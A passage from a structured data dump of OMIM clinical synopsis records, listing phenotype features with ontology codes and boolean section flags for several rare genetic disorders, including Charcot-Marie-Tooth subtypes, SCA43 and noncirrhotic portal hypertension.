'growthHeightExists': False,
'growthWeightExists': False,
'growthOtherExists': False,
'headAndNeckExists': True,
'headAndNeckHeadExists': False,
'headAndNeckFaceExists': False,
'headAndNeckEarsExists': False,
'headAndNeckEyesExists': True,
'headAndNeckNoseExists': False,
'headAndNeckMouthExists': False,
'headAndNeckTeethExists': False,
'headAndNeckNeckExists': False,
'cardiovascularExists': False,
'cardiovascularHeartExists': False,
'cardiovascularVascularExists': False,
'respiratoryExists': False,
'respiratoryNasopharynxExists': False,
'respiratoryLarynxExists': False,
'respiratoryAirwaysExists': False,
'respiratoryLungExists': False,
'chestExists': False,
'chestExternalFeaturesExists': False,
'chestRibsSternumClaviclesAndScapulaeExists': False,
'chestBreastsExists': False,
'chestDiaphragmExists': False,
'abdomenExists': False,
'abdomenExternalFeaturesExists': False,
'abdomenLiverExists': False,
'abdomenPancreasExists': False,
'abdomenBiliaryTractExists': False,
'abdomenSpleenExists': False,
'abdomenGastrointestinalExists': False,
'genitourinaryExists': False,
'genitourinaryExternalGenitaliaMaleExists': False,
'genitourinaryExternalGenitaliaFemaleExists': False,
'genitourinaryInternalGenitaliaMaleExists': False,
'genitourinaryInternalGenitaliaFemaleExists': False,
'genitourinaryKidneysExists': False,
'genitourinaryUretersExists': False,
'genitourinaryBladderExists': False,
'skeletalExists': False,
'skeletalSkullExists': False,
'skeletalSpineExists': False,
'skeletalPelvisExists': False,
'skeletalLimbsExists': False,
'skeletalHandsExists': False,
'skeletalFeetExists': False,
'skinNailsHairExists': False,
'skinNailsHairSkinExists': False,
'skinNailsHairSkinHistologyExists': False,
'skinNailsHairSkinElectronMicroscopyExists': False,
'skinNailsHairNailsExists': False,
'skinNailsHairHairExists': False,
'muscleSoftTissueExists': True,
'neurologicExists': True,
'neurologicCentralNervousSystemExists': True,
'neurologicPeripheralNervousSystemExists': False,
'neurologicBehavioralPsychiatricManifestationsExists': False,
'voiceExists': False,
'metabolicFeaturesExists': False,
'endocrineFeaturesExists': False,
'hematologyExists': False,
'immunologyExists': False,
'neoplasiaExists': False,
'prenatalManifestationsExists': False,
'prenatalManifestationsMovementExists': False,
'prenatalManifestationsAmnioticFluidExists': False,
'prenatalManifestationsPlacentaAndUmbilicalCordExists': False,
'prenatalManifestationsMaternalExists': False,
'prenatalManifestationsDeliveryExists': False,
'laboratoryAbnormalitiesExists': False,
'miscellaneousExists': True,
'molecularBasisExists': True,
'matches': ''
} },
{'clinicalSynopsis': {
'mimNumber': 617017,
'prefix': '#',
'preferredTitle': 'CHARCOT-MARIE-TOOTH DISEASE, AXONAL, TYPE 2T; CMT2T',
'inheritance': '''Autosomal recessive {SNOMEDCT:258211005} {UMLS C0441748 HP:0000007} {HPO HP:0000007 C0441748,C4020899};\nAutosomal dominant {SNOMEDCT:263681008} {UMLS C0443147 HP:0000006} {HPO HP:0000006 C0443147}''',
'muscleSoftTissue': '''Distal muscle weakness due to peripheral neuropathy {UMLS C1836731};\nDistal muscle atrophy due to peripheral neuropathy {UMLS C1844874}''',
'neurologicCentralNervousSystem': 'No dementia {UMLS C1838634}',
'neurologicPeripheralNervousSystem': '''Axonal sensorimotor neuropathy {SNOMEDCT:230657007} {UMLS C0393907};\nDistal sensory impairment {UMLS C1847584 HP:0002936} {HPO HP:0002936 C1847584};\nFoot drop {SNOMEDCT:6077001} {UMLS C0085684 HP:0009027} {HPO HP:0009027 C0085684,C1866141};\nGait instability {SNOMEDCT:394616008,22631008} {UMLS C0231686 HP:0002317} {HPO HP:0002317 C0231686};\nHyporeflexia {SNOMEDCT:22994000,405946002} {UMLS C0151888,C0700078 HP:0001315,HP:0001265} {HPO HP:0001265 C0700078};\nAreflexia {SNOMEDCT:37280007} {UMLS C0234146 HP:0001284} {HPO HP:0001284 C0234146,C0241772,C0278124};\nLoss of large myelinated fibers seen on sural nerve biopsy {UMLS C3552146}''',
'miscellaneous': '''Adult onset (range 36 to 56 years) {UMLS C4314131} {HPO HP:0003581 C1853562};\nSlowly progressive {UMLS C1854494 HP:0003677} {HPO HP:0003677 C1854494};\nSome patients have heterozygous mutations and may show slightly later onset {UMLS C4314130}''',
'molecularBasis': 'Caused by mutation in the membrane metalloendopeptidase gene (MME, {120520.0001})',
'inheritanceExists': True,
'growthExists': False,
'growthHeightExists': False,
'growthWeightExists': False,
'growthOtherExists': False,
'headAndNeckExists': False,
'headAndNeckHeadExists': False,
'headAndNeckFaceExists': False,
'headAndNeckEarsExists': False,
'headAndNeckEyesExists': False,
'headAndNeckNoseExists': False,
'headAndNeckMouthExists': False,
'headAndNeckTeethExists': False,
'headAndNeckNeckExists': False,
'cardiovascularExists': False,
'cardiovascularHeartExists': False,
'cardiovascularVascularExists': False,
'respiratoryExists': False,
'respiratoryNasopharynxExists': False,
'respiratoryLarynxExists': False,
'respiratoryAirwaysExists': False,
'respiratoryLungExists': False,
'chestExists': False,
'chestExternalFeaturesExists': False,
'chestRibsSternumClaviclesAndScapulaeExists': False,
'chestBreastsExists': False,
'chestDiaphragmExists': False,
'abdomenExists': False,
'abdomenExternalFeaturesExists': False,
'abdomenLiverExists': False,
'abdomenPancreasExists': False,
'abdomenBiliaryTractExists': False,
'abdomenSpleenExists': False,
'abdomenGastrointestinalExists': False,
'genitourinaryExists': False,
'genitourinaryExternalGenitaliaMaleExists': False,
'genitourinaryExternalGenitaliaFemaleExists': False,
'genitourinaryInternalGenitaliaMaleExists': False,
'genitourinaryInternalGenitaliaFemaleExists': False,
'genitourinaryKidneysExists': False,
'genitourinaryUretersExists': False,
'genitourinaryBladderExists': False,
'skeletalExists': False,
'skeletalSkullExists': False,
'skeletalSpineExists': False,
'skeletalPelvisExists': False,
'skeletalLimbsExists': False,
'skeletalHandsExists': False,
'skeletalFeetExists': False,
'skinNailsHairExists': False,
'skinNailsHairSkinExists': False,
'skinNailsHairSkinHistologyExists': False,
'skinNailsHairSkinElectronMicroscopyExists': False,
'skinNailsHairNailsExists': False,
'skinNailsHairHairExists': False,
'muscleSoftTissueExists': True,
'neurologicExists': True,
'neurologicCentralNervousSystemExists': True,
'neurologicPeripheralNervousSystemExists': True,
'neurologicBehavioralPsychiatricManifestationsExists': False,
'voiceExists': False,
'metabolicFeaturesExists': False,
'endocrineFeaturesExists': False,
'hematologyExists': False,
'immunologyExists': False,
'neoplasiaExists': False,
'prenatalManifestationsExists': False,
'prenatalManifestationsMovementExists': False,
'prenatalManifestationsAmnioticFluidExists': False,
'prenatalManifestationsPlacentaAndUmbilicalCordExists': False,
'prenatalManifestationsMaternalExists': False,
'prenatalManifestationsDeliveryExists': False,
'laboratoryAbnormalitiesExists': False,
'miscellaneousExists': True,
'molecularBasisExists': True,
'matches': ''
} },
{'clinicalSynopsis': {
'mimNumber': 617066,
'prefix': '#',
'preferredTitle': 'MUSCULAR DYSTROPHY, CONGENITAL, DAVIGNON-CHAUVEAU TYPE; MDCDC',
'inheritance': 'Autosomal recessive {SNOMEDCT:258211005} {UMLS C0441748 HP:0000007} {HPO HP:0000007 C0441748,C4020899}',
'headAndNeckMouth': 'High-arched palate (1 patient) {UMLS C3278542} {HPO HP:0000218 C0240635}',
'headAndNeckNeck': 'Neck muscle weakness {UMLS C0240479 HP:0000467} {HPO HP:0000467 C0240479}',
'respiratory': 'Respiratory insufficiency due to muscle weakness {UMLS C3806467 HP:0002747} {HPO HP:0002747 C3806467}',
'chestExternalFeatures': '''Pectus excavatum {SNOMEDCT:391987005,391982004} {ICD10CM:Q67.6} {ICD9CM:754.81} {UMLS C2051831,C0016842 HP:0000767} {HPO HP:0000767 C2051831};\nFlat thorax {UMLS C1864447};\nFunnel thorax {UMLS C4539574}''',
'abdomenGastrointestinal': 'Feeding difficulties due to muscle weakness {UMLS C4015366}',
'skeletal': 'Joint hyperlaxity {UMLS C1862377}',
'skeletalSpine': '''Scoliosis {SNOMEDCT:298382003,20944008,111266001} {ICD10CM:Q67.5,M41,M41.9} {UMLS C0559260,C0036439,C4552773,C0700208 HP:0002650} {HPO HP:0002650 C0037932,C0700208};\nRigid spine {UMLS C1858025 HP:0003306} {HPO HP:0003306 C1858025}''',
'skinNailsHairSkin': '''Dry skin {SNOMEDCT:16386004} {UMLS C0151908,C0720057,C1963094 HP:0000958} {HPO HP:0000958 C0151908,C0259817};\nHyperelasticity, mild {UMLS C4313904};\nFollicular hyperkeratosis {SNOMEDCT:81845009,402341008,238629004} {UMLS C0334013 HP:0007502} {HPO HP:0007502 C0334013}''',
'muscleSoftTissue': '''Hypotonia, severe {UMLS C1839630 HP:0006829} {HPO HP:0006829 C1839630};\nMuscle biopsy shows dystrophic changes {UMLS C1864711 HP:0003560} {HPO HP:0003560 C0026850,C1864711};\nFiber size variability {UMLS C3552710};\nRounded fibers {UMLS C4313909};\nCentralized nuclei {UMLS C1842170 HP:0003687} {HPO HP:0003687 C1842170};\nMinicore lesions {UMLS C4313908};\nAngular fibers {UMLS C4313907};\nCap lesions {UMLS C4313906};\nMyopathic features seen on EMG {UMLS C4231415};\nFatty degeneration of muscles {UMLS C4313905}''',
'neurologicCentralNervousSystem': '''Delayed motor development, severe {UMLS C3278698} {HPO HP:0001270 C1854301,C4020874};\nLearning difficulties (in 2 patients) {UMLS C4313910}''',
'miscellaneous': '''Onset at birth {UMLS C1836142 HP:0003577} {HPO HP:0003577 C1836142,C2752013};\nPatients become wheelchair bound in the second decade {UMLS C4313902};\nOne consanguineous family has been reported (last curated August 2016) {UMLS C4313901}''',
'molecularBasis': 'Caused by mutation in the thyroid hormone receptor interactor 4 gene (TRIP4, {604501.0003})',
'inheritanceExists': True,
'growthExists': False,
'growthHeightExists': False,
'growthWeightExists': False,
'growthOtherExists': False,
'headAndNeckExists': True,
'headAndNeckHeadExists': False,
'headAndNeckFaceExists': False,
'headAndNeckEarsExists': False,
'headAndNeckEyesExists': False,
'headAndNeckNoseExists': False,
'headAndNeckMouthExists': True,
'headAndNeckTeethExists': False,
'headAndNeckNeckExists': True,
'cardiovascularExists': False,
'cardiovascularHeartExists': False,
'cardiovascularVascularExists': False,
'respiratoryExists': True,
'respiratoryNasopharynxExists': False,
'respiratoryLarynxExists': False,
'respiratoryAirwaysExists': False,
'respiratoryLungExists': False,
'chestExists': True,
'chestExternalFeaturesExists': True,
'chestRibsSternumClaviclesAndScapulaeExists': False,
'chestBreastsExists': False,
'chestDiaphragmExists': False,
'abdomenExists': True,
'abdomenExternalFeaturesExists': False,
'abdomenLiverExists': False,
'abdomenPancreasExists': False,
'abdomenBiliaryTractExists': False,
'abdomenSpleenExists': False,
'abdomenGastrointestinalExists': True,
'genitourinaryExists': False,
'genitourinaryExternalGenitaliaMaleExists': False,
'genitourinaryExternalGenitaliaFemaleExists': False,
'genitourinaryInternalGenitaliaMaleExists': False,
'genitourinaryInternalGenitaliaFemaleExists': False,
'genitourinaryKidneysExists': False,
'genitourinaryUretersExists': False,
'genitourinaryBladderExists': False,
'skeletalExists': True,
'skeletalSkullExists': False,
'skeletalSpineExists': True,
'skeletalPelvisExists': False,
'skeletalLimbsExists': False,
'skeletalHandsExists': False,
'skeletalFeetExists': False,
'skinNailsHairExists': True,
'skinNailsHairSkinExists': True,
'skinNailsHairSkinHistologyExists': False,
'skinNailsHairSkinElectronMicroscopyExists': False,
'skinNailsHairNailsExists': False,
'skinNailsHairHairExists': False,
'muscleSoftTissueExists': True,
'neurologicExists': True,
'neurologicCentralNervousSystemExists': True,
'neurologicPeripheralNervousSystemExists': False,
'neurologicBehavioralPsychiatricManifestationsExists': False,
'voiceExists': False,
'metabolicFeaturesExists': False,
'endocrineFeaturesExists': False,
'hematologyExists': False,
'immunologyExists': False,
'neoplasiaExists': False,
'prenatalManifestationsExists': False,
'prenatalManifestationsMovementExists': False,
'prenatalManifestationsAmnioticFluidExists': False,
'prenatalManifestationsPlacentaAndUmbilicalCordExists': False,
'prenatalManifestationsMaternalExists': False,
'prenatalManifestationsDeliveryExists': False,
'laboratoryAbnormalitiesExists': False,
'miscellaneousExists': True,
'molecularBasisExists': True,
'matches': ''
} },
{'clinicalSynopsis': {
'mimNumber': 617018,
'prefix': '#',
'preferredTitle': 'SPINOCEREBELLAR ATAXIA 43; SCA43',
'inheritance': 'Autosomal dominant {SNOMEDCT:263681008} {UMLS C0443147 HP:0000006} {HPO HP:0000006 C0443147}',
'headAndNeckEyes': '''Hypometric saccades (in some patients) {UMLS C3809329} {HPO HP:0000571 C0423082};\nNystagmus (in some patients) {UMLS C3549480} {HPO HP:0000639 C0028738}''',
'chestExternalFeatures': 'Pectus carinatum {SNOMEDCT:205101001,38774000} {ICD10CM:Q67.7} {ICD9CM:754.82} {UMLS C2939416,C0158731 HP:0000768} {HPO HP:0000768 C0158731}',
'skeletalFeet': 'Pes cavus {SNOMEDCT:36755004,302295001,86900005,205091006} {ICD10CM:Q66.7} {ICD9CM:754.71,736.73} {UMLS C0728829,C2239098,C0579144,C0039273 HP:0001761} {HPO HP:0001761 C0728829} {EOM ID:6edfece89c0b7df3 IMG:Pes_Cavus-small.jpg}',
'muscleSoftTissue': 'Distal amyotrophy {UMLS C1848736 HP:0003693} {HPO HP:0003693 C1848736}',
'neurologicCentralNervousSystem': '''Cerebellar ataxia {SNOMEDCT:85102008} {UMLS C0007758 HP:0001251} {HPO HP:0001251 C0007758};\nGait ataxia {SNOMEDCT:25136009} {ICD10CM:R26.0} {UMLS C0751837 HP:0002066} {HPO HP:0002066 C0751837};\nLimb ataxia {UMLS C0750937 HP:0002070} {HPO HP:0002070 C0750937};\nBalance problems {UMLS C0575090};\nDysarthria {SNOMEDCT:8011004} {ICD9CM:438.13,784.51} {UMLS C0013362,C4553903 HP:0001260} {HPO HP:0001260 C0013362};\nTremor {SNOMEDCT:26079004} {ICD10CM:R25.1} {UMLS C0040822,C4554265,C1963252 HP:0001337} {HPO HP:0001337 C0040822};\nUpper limb involvement (in some patients) {UMLS C3807867};\nRigidity (in some patients) {UMLS C4314129} {HPO HP:0002063 C0026837};\nCerebellar atrophy {UMLS C0740279 HP:0001272} {HPO HP:0001272 C0262404,C0740279,C4020873}''',
'neurologicPeripheralNervousSystem': '''Hyporeflexia {SNOMEDCT:22994000,405946002} {UMLS C0151888,C0700078 HP:0001315,HP:0001265} {HPO HP:0001265 C0700078};\nAxonal motor neuropathy {UMLS C2749625 HP:0007002};\nDistal sensory impairment (in some patients) {UMLS C3807562} {HPO HP:0002936 C1847584};\nDistal limb pain {UMLS C4314128}''',
'miscellaneous': '''Adult onset (range 42 to 68 years) {UMLS C4314126} {HPO HP:0003581 C1853562};\nSlowly progressive {UMLS C1854494 HP:0003677} {HPO HP:0003677 C1854494};\nOne Belgian family has been reported (last curated July 2016) {UMLS C4314125}''',
'molecularBasis': 'Caused by mutation in the membrane metalloendopeptidase gene (MME, {120520.0006})',
'inheritanceExists': True,
'growthExists': False,
'growthHeightExists': False,
'growthWeightExists': False,
'growthOtherExists': False,
'headAndNeckExists': True,
'headAndNeckHeadExists': False,
'headAndNeckFaceExists': False,
'headAndNeckEarsExists': False,
'headAndNeckEyesExists': True,
'headAndNeckNoseExists': False,
'headAndNeckMouthExists': False,
'headAndNeckTeethExists': False,
'headAndNeckNeckExists': False,
'cardiovascularExists': False,
'cardiovascularHeartExists': False,
'cardiovascularVascularExists': False,
'respiratoryExists': False,
'respiratoryNasopharynxExists': False,
'respiratoryLarynxExists': False,
'respiratoryAirwaysExists': False,
'respiratoryLungExists': False,
'chestExists': True,
'chestExternalFeaturesExists': True,
'chestRibsSternumClaviclesAndScapulaeExists': False,
'chestBreastsExists': False,
'chestDiaphragmExists': False,
'abdomenExists': False,
'abdomenExternalFeaturesExists': False,
'abdomenLiverExists': False,
'abdomenPancreasExists': False,
'abdomenBiliaryTractExists': False,
'abdomenSpleenExists': False,
'abdomenGastrointestinalExists': False,
'genitourinaryExists': False,
'genitourinaryExternalGenitaliaMaleExists': False,
'genitourinaryExternalGenitaliaFemaleExists': False,
'genitourinaryInternalGenitaliaMaleExists': False,
'genitourinaryInternalGenitaliaFemaleExists': False,
'genitourinaryKidneysExists': False,
'genitourinaryUretersExists': False,
'genitourinaryBladderExists': False,
'skeletalExists': True,
'skeletalSkullExists': False,
'skeletalSpineExists': False,
'skeletalPelvisExists': False,
'skeletalLimbsExists': False,
'skeletalHandsExists': False,
'skeletalFeetExists': True,
'skinNailsHairExists': False,
'skinNailsHairSkinExists': False,
'skinNailsHairSkinHistologyExists': False,
'skinNailsHairSkinElectronMicroscopyExists': False,
'skinNailsHairNailsExists': False,
'skinNailsHairHairExists': False,
'muscleSoftTissueExists': True,
'neurologicExists': True,
'neurologicCentralNervousSystemExists': True,
'neurologicPeripheralNervousSystemExists': True,
'neurologicBehavioralPsychiatricManifestationsExists': False,
'voiceExists': False,
'metabolicFeaturesExists': False,
'endocrineFeaturesExists': False,
'hematologyExists': False,
'immunologyExists': False,
'neoplasiaExists': False,
'prenatalManifestationsExists': False,
'prenatalManifestationsMovementExists': False,
'prenatalManifestationsAmnioticFluidExists': False,
'prenatalManifestationsPlacentaAndUmbilicalCordExists': False,
'prenatalManifestationsMaternalExists': False,
'prenatalManifestationsDeliveryExists': False,
'laboratoryAbnormalitiesExists': False,
'miscellaneousExists': True,
'molecularBasisExists': True,
'matches': ''
} },
{'clinicalSynopsis': {
'mimNumber': 617068,
'prefix': '#',
'preferredTitle': 'PORTAL HYPERTENSION, NONCIRRHOTIC; NCPH',
'inheritance': 'Autosomal recessive {SNOMEDCT:258211005} {UMLS C0441748 HP:0000007} {HPO HP:0000007 C0441748,C4020899}',
'abdomenLiver': '''Hepatomegaly {SNOMEDCT:80515008} {ICD10CM:R16.0} {ICD9CM:789.1} {UMLS C0019209 HP:0002240} {HPO HP:0002240 C0019209};\nPortal hypertension {SNOMEDCT:34742003} {ICD10CM:K76.6} {ICD9CM:572.3} {UMLS C4552669,C0020541 HP:0001409} {HPO HP:0001409 C0020541};\nFibromuscular thickening of the portal venules seen on biopsy {UMLS C4313900};\nNarrowed venule lumens {UMLS C4313899};\nNormal liver synthetic function {UMLS C4313898}''',
'abdomenSpleen': 'Splenomegaly {SNOMEDCT:16294009} {ICD10CM:R16.1} {ICD9CM:789.2} {UMLS C0038002 HP:0001744} {HPO HP:0001744 C0038002}',
'abdomenGastrointestinal': 'Esophageal varices, small (in some patients) {UMLS C4313897}',
'laboratoryAbnormalities': 'Normal liver enzymes {SNOMEDCT:166642001} {UMLS C0438236}',
'miscellaneous': '''Onset in first or second decade {UMLS C1866641};\nStable clinical picture {UMLS C4313895};\nThree patients from 2 unrelated Turkish families have been reported (last curated August 2016) {UMLS C4313894}''',
'molecularBasis': 'Caused by mutation in the deoxyguanosine kinase gene (DGUOK, {601465.0008})',
'inheritanceExists': True,
'growthExists': False,
'growthHeightExists': False,
'growthWeightExists': False,
'growthOtherExists': False,
'headAndNeckExists': False,
'headAndNeckHeadExists': False,
'headAndNeckFaceExists': False,
'headAndNeckEarsExists': False,
'headAndNeckEyesExists': False,
'headAndNeckNoseExists': False,
'headAndNeckMouthExists': False,
'headAndNeckTeethExists': False,
'headAndNeckNeckExists': False,
'cardiovascularExists': False,
'cardiovascularHeartExists': False,
'cardiovascularVascularExists': False,
'respiratoryExists': False,
'respiratoryNasopharynxExists': False,
'respiratoryLarynxExists': False,
'respiratoryAirwaysExists': False,
'respiratoryLungExists': False,
'chestExists': False,
'chestExternalFeaturesExists': False,
'chestRibsSternumClaviclesAndScapulaeExists': False,
'chestBreastsExists': False,
'chestDiaphragmExists': False,
'abdomenExists': True,
'abdomenExternalFeaturesExists': False,
'abdomenLiverExists': True,
'abdomenPancreasExists': False,
'abdomenBiliaryTractExists': False,
'abdomenSpleenExists': True,
'abdomenGastrointestinalExists': True,
'genitourinaryExists': False,
'genitourinaryExternalGenitaliaMaleExists': False,
'genitourinaryExternalGenitaliaFemaleExists': False,
'genitourinaryInternalGenitaliaMaleExists': False,
'genitourinaryInternalGenitaliaFemaleExists': False,
'genitourinaryKidneysExists': False,
'genitourinaryUretersExists': False,
'genitourinaryBladderExists': False,
'skeletalExists': False,
'skeletalSkullExists': False,
'skeletalSpineExists': False,
'skeletalPelvisExists': False,
'skeletalLimbsExists': False,
'skeletalHandsExists': False,
'skeletalFeetExists': False,
'skinNailsHairExists': False,
'skinNailsHairSkinExists': False,
'skinNailsHairSkinHistologyExists': False,
'skinNailsHairSkinElectronMicroscopyExists': False,
'skinNailsHairNailsExists': False,
'skinNailsHairHairExists': False,
'muscleSoftTissueExists': False,
'neurologicExists': False,
'neurologicCentralNervousSystemExists': False,
'neurologicPeripheralNervousSystemExists': False,
'neurologicBehavioralPsychiatricManifestationsExists': False,
'voiceExists': False,
'metabolicFeaturesExists': False,
'endocrineFeaturesExists': False,
'hematologyExists': False,
'immunologyExists': False,
'neoplasiaExists': False,
'prenatalManifestationsExists': False,
'prenatalManifestationsMovementExists': False,
'prenatalManifestationsAmnioticFluidExists': False,
'prenatalManifestationsPlacentaAndUmbilicalCordExists': False,
'prenatalManifestationsMaternalExists': False,
'prenatalManifestationsDeliveryExists': False,
'laboratoryAbnormalitiesExists': True,
'miscellaneousExists': True,
'molecularBasisExists': True,
'matches': ''
} },
{'clinicalSynopsis': {
'mimNumber': 617087,
'prefix': '#',
'preferredTitle': 'CHARCOT-MARIE-TOOTH DISEASE, AXONAL, AUTOSOMAL RECESSIVE, TYPE 2A2B; CMT2A2B',
'inheritance': 'Autosomal recessive {SNOMEDCT:258211005} {UMLS C0441748 HP:0000007} {HPO HP:0000007 C0441748,C4020899}',
'headAndNeckEars': 'Hearing impairment (in some patients) {UMLS C3806568} {HPO HP:0000365 C0011053,C0018772,C0339789,C1384666}',
'headAndNeckEyes': '''Optic atrophy {SNOMEDCT:76976005} {ICD10CM:H47.2,H47.20} {ICD9CM:377.10,377.1} {UMLS C0029124 HP:0000648} {HPO HP:0000648 C0029124};\nPale optic discs {SNOMEDCT:302200001} {UMLS C0554970 HP:0000543} {HPO HP:0000543 C0554970};\nVisual impairment, later onset (in some patients) {UMLS C4313838}''',
'respiratory': 'Respiratory insufficiency due to muscle weakness (in some patients) {UMLS C3808043} {HPO HP:0002747 C3806467}',
'skeletalSpine': '''Scoliosis {SNOMEDCT:298382003,20944008,111266001} {ICD10CM:Q67.5,M41,M41.9} {UMLS C0559260,C0036439,C4552773,C0700208 HP:0002650} {HPO HP:0002650 C0037932,C0700208};\nKyphosis {SNOMEDCT:71311003,413428007,414564002} {ICD10CM:M40.20,Q76.41} {ICD9CM:737.1} {UMLS C0022822,C0022821,C2115817,C0265673,C4552747 HP:0002808} {HPO HP:0002808 C0022821,C1845112}''',
'skeletalFeet': 'Pes cavus {SNOMEDCT:36755004,302295001,86900005,205091006} {ICD10CM:Q66.7} {ICD9CM:754.71,736.73} {UMLS C0728829,C2239098,C0579144,C0039273 HP:0001761} {HPO HP:0001761 C0728829} {EOM ID:6edfece89c0b7df3 IMG:Pes_Cavus-small.jpg}',
'muscleSoftTissue': '''Distal muscle weakness, upper and lower limbs, due to peripheral neuropathy {UMLS C3808787};\nDistal muscle atrophy, upper and lower limbs, due to peripheral neuropathy {UMLS C3808788};\nProximal muscle weakness may also occur {UMLS C4313839}''',
'neurologicCentralNervousSystem': '''Delayed gross motor development {SNOMEDCT:430099007} {UMLS C1837658 HP:0002194} {HPO HP:0002194 C1837658};\nDifficulty walking {SNOMEDCT:719232003,228158008} {ICD9CM:719.7} {UMLS C0311394 HP:0002355} {HPO HP:0002355 C0311394};\nFoot drop {SNOMEDCT:6077001} {UMLS C0085684 HP:0009027} {HPO HP:0009027 C0085684,C1866141};\nLoss of ambulation {UMLS C2678024}''',
'neurologicPeripheralNervousSystem': '''Distal sensory impairment {UMLS C1847584 HP:0002936} {HPO HP:0002936 C1847584};\nAxonal neuropathy {SNOMEDCT:60703000} {UMLS C0270921 HP:0003477} {HPO HP:0003477 C0270921,C1263857};\nHyporeflexia {SNOMEDCT:22994000,405946002} {UMLS C0151888,C0700078 HP:0001315,HP:0001265} {HPO HP:0001265 C0700078};\nSural nerve biopsy shows loss of large myelinated fibers {UMLS C1853771}''',
'miscellaneous': '''Onset in first years of life {UMLS C1848924 HP:0003593};\nVariable severity {UMLS C1861403 HP:0003828} {HPO HP:0003828 C1861403,C1866862};\nMost patients become wheelchair-bound {UMLS C1846606}''',
'molecularBasis': 'Caused by mutation in the mitofusin 2 gene (MFN2, {608507.0013})',
'inheritanceExists': True,
'growthExists': False,
'growthHeightExists': False,
'growthWeightExists': False,
'growthOtherExists': False,
'headAndNeckExists': True,
'headAndNeckHeadExists': False,
'headAndNeckFaceExists': False,
'headAndNeckEarsExists': True,
'headAndNeckEyesExists': True,
'headAndNeckNoseExists': False,
'headAndNeckMouthExists': False,
'headAndNeckTeethExists': False,
'headAndNeckNeckExists': False,
'cardiovascularExists': False,
'cardiovascularHeartExists': False,
'cardiovascularVascularExists': False,
'respiratoryExists': True,
'respiratoryNasopharynxExists': False,
'respiratoryLarynxExists': False,
'respiratoryAirwaysExists': False,
'respiratoryLungExists': False,
'chestExists': False,
'chestExternalFeaturesExists': False,
'chestRibsSternumClaviclesAndScapulaeExists': False,
'chestBreastsExists': False,
'chestDiaphragmExists': False,
'abdomenExists': False,
'abdomenExternalFeaturesExists': False,
'abdomenLiverExists': False,
'abdomenPancreasExists': False,
'abdomenBiliaryTractExists': False,
'abdomenSpleenExists': False,
'abdomenGastrointestinalExists': False,
'genitourinaryExists': False,
'genitourinaryExternalGenitaliaMaleExists': False,
'genitourinaryExternalGenitaliaFemaleExists': False,
'genitourinaryInternalGenitaliaMaleExists': False,
'genitourinaryInternalGenitaliaFemaleExists': False,
'genitourinaryKidneysExists': False,
'genitourinaryUretersExists': False,
'genitourinaryBladderExists': False,
'skeletalExists': True,
'skeletalSkullExists': False,
'skeletalSpineExists': True,
'skeletalPelvisExists': False,
'skeletalLimbsExists': False,
'skeletalHandsExists': False,
'skeletalFeetExists': True,
'skinNailsHairExists': False,
'skinNailsHairSkinExists': False,
'skinNailsHairSkinHistologyExists': False,
'skinNailsHairSkinElectronMicroscopyExists': False,
'skinNailsHairNailsExists': False,
'skinNailsHairHairExists': False,
'muscleSoftTissueExists': True,
'neurologicExists': True,
'neurologicCentralNervousSystemExists': True,
'neurologicPeripheralNervousSystemExists': True,
'neurologicBehavioralPsychiatricManifestationsExists': False,
'voiceExists': False,
'metabolicFeaturesExists': False,
'endocrineFeaturesExists': False,
'hematologyExists': False,
'immunologyExists': False,
'neoplasiaExists': False,
'prenatalManifestationsExists': False,
'prenatalManifestationsMovementExists': False,
'prenatalManifestationsAmnioticFluidExists': False,
'prenatalManifestationsPlacentaAndUmbilicalCordExists': False,
'prenatalManifestationsMaternalExists': False,
'prenatalManifestationsDeliveryExists': False,
'laboratoryAbnormalitiesExists': False,
'miscellaneousExists': True,
'molecularBasisExists': True,
'matches': ''
} },
{'clinicalSynopsis': {
'mimNumber': 617020,
'prefix': '#',
'preferredTitle': 'EPILEPTIC ENCEPHALOPATHY, EARLY INFANTILE, 38; EIEE38',
'inheritance': 'Autosomal recessive {SNOMEDCT:258211005} {UMLS C0441748 HP:0000007} {HPO HP:0000007 C0441748,C4020899}',
'headAndNeckEyes': '''Retinal dystrophy (1 patient) {UMLS C4314124} {HPO HP:0000556 C0854723};\nPoor visual contact {UMLS C3552514};\nRoving eye movements {SNOMEDCT:45339001} {ICD10CM:H55.03} {ICD9CM:379.53} {UMLS C0271384}''',
'muscleSoftTissue': 'Hypotonia {SNOMEDCT:398152000,398151007} {UMLS C0026827,C1858120 HP:0001290,HP:0001252} {HPO HP:0001290 C1858120}',
'neurologicCentralNervousSystem': '''Epileptic encephalopathy {SNOMEDCT:723125008} {UMLS C0543888 HP:0200134} {HPO HP:0200134 C0543888};\nIntractable seizures {UMLS C2674422};\nStatus epilepticus {SNOMEDCT:230456007} {UMLS C0038220 HP:0002133} {HPO HP:0002133 C0038220};\nDevelopmental delay, severe {UMLS C1853567} {HPO HP:0001263 C0557874,C1864897,C4020875};\nIntellectual disability, profound {ICD10CM:F73} {ICD9CM:318.2} {UMLS C3161330 HP:0002187} {HPO HP:0002187 C0020796,C3161330};\nAtaxia {SNOMEDCT:39384006,85102008,20262006} {ICD10CM:R27.0} {ICD9CM:438.84} {UMLS C0004134,C1135207,C0007758,C4554639 HP:0010867,HP:0001251} {HPO HP:0001251 C0007758};\nDystonia {SNOMEDCT:15802004} {ICD10CM:G24,G24.9} {UMLS C0393593,C0013421 HP:0001332} {HPO HP:0001332 C0013421,C4020871};\nPeripheral hypertonia {UMLS C1842365}''',
'miscellaneous': '''Onset in infancy {UMLS C1848924 HP:0003593} {HPO HP:0003593 C1848924};\nSevere disorder {UMLS C1836348};\nSome patients may die in early childhood {UMLS C4314122};\nTwo unrelated consanguineous families have been reported (last curated July 2016) {UMLS C4314121}''',
'molecularBasis': 'Caused by mutation in the homolog of the S. Cerevisiae ARV1 gene (ARV1, {611647.0001})',
'inheritanceExists': True,
'growthExists': False,
'growthHeightExists': False,
'growthWeightExists': False,
'growthOtherExists': False,
'headAndNeckExists': True,
'headAndNeckHeadExists': False,
'headAndNeckFaceExists': False,
'headAndNeckEarsExists': False,
'headAndNeckEyesExists': True,
'headAndNeckNoseExists': False,
'headAndNeckMouthExists': False,
'headAndNeckTeethExists': False,
'headAndNeckNeckExists': False,
'cardiovascularExists': False,
'cardiovascularHeartExists': False,
'cardiovascularVascularExists': False,
'respiratoryExists': False,
'respiratoryNasopharynxExists': False,
'respiratoryLarynxExists': False,
'respiratoryAirwaysExists': False,
'respiratoryLungExists': False,
'chestExists': False,
'chestExternalFeaturesExists': False,
'chestRibsSternumClaviclesAndScapulaeExists': False,
'chestBreastsExists': False,
'chestDiaphragmExists': False,
'abdomenExists': False,
'abdomenExternalFeaturesExists': False,
